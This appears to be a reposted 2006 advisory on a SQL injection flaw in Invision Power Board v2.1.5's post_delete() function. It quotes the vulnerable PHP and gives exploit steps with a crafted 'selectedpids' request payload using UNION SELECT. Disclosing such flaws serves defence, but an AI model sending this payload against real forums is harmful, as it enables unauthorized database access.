Ads Invision Power Board v2.1.5 Remote SQL Injection Tuesday, 02 May 2006 Invision Power Board v2.1.5 Remote SQL Injection Filename :- func_mod.php Functionname :- post_delete() Lines :- 89 To 209 Bug Found By :- Devil-00 Greetz :- Rock Master ^ Hackers Pal ^ n0m4rcy ^ www.securtygurus.net [Code] if ( is_array( $id ) ) { if ( count($id) > 0 ) { $pid = " IN(".implode(",",$id).")"; } else { return FALSE; } } else { if ( intval($id) ) { $pid = "=$id"; } else { return FALSE; } } [/CODE] When $id = array .. the code dont check it if ( INTVAL ) [CODE] if ( count($id) > 0 ) { $pid = " IN(".implode(",",$id).")"; } [/CODE] Then We Can Do SQL Injection Here >> [CODE] $this->ipsclass->DB->simple_construct( array( select => pid, topic_id, from => posts, where => pid.$pid ) ); [/CODE] And Here >> [CODE] $this->ipsclass->DB->simple_construct( array( select => *, from => attachments, where => "attach_pid".$pid ) ); [/CODE] Cuz We Have 2 Querys With diffiernt Tabels Number We Cant Use UNION To Exploit :( Baaad :( Exm. To Exploit 1- First Add 2 Post 2- Check It To Delete 3- Edit String Query By HTTPLiveHeader [CODE] act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete [/CODE]   < Prev   Next > [ Back ]

Main Menu SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus Windows Focus VNews Vulnerability Hacking Sql Injection map Downloads Affiliates Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Copyright 2005-2007 SpamAlertz.com, Content on this site is From variuos other emails, and Advisories.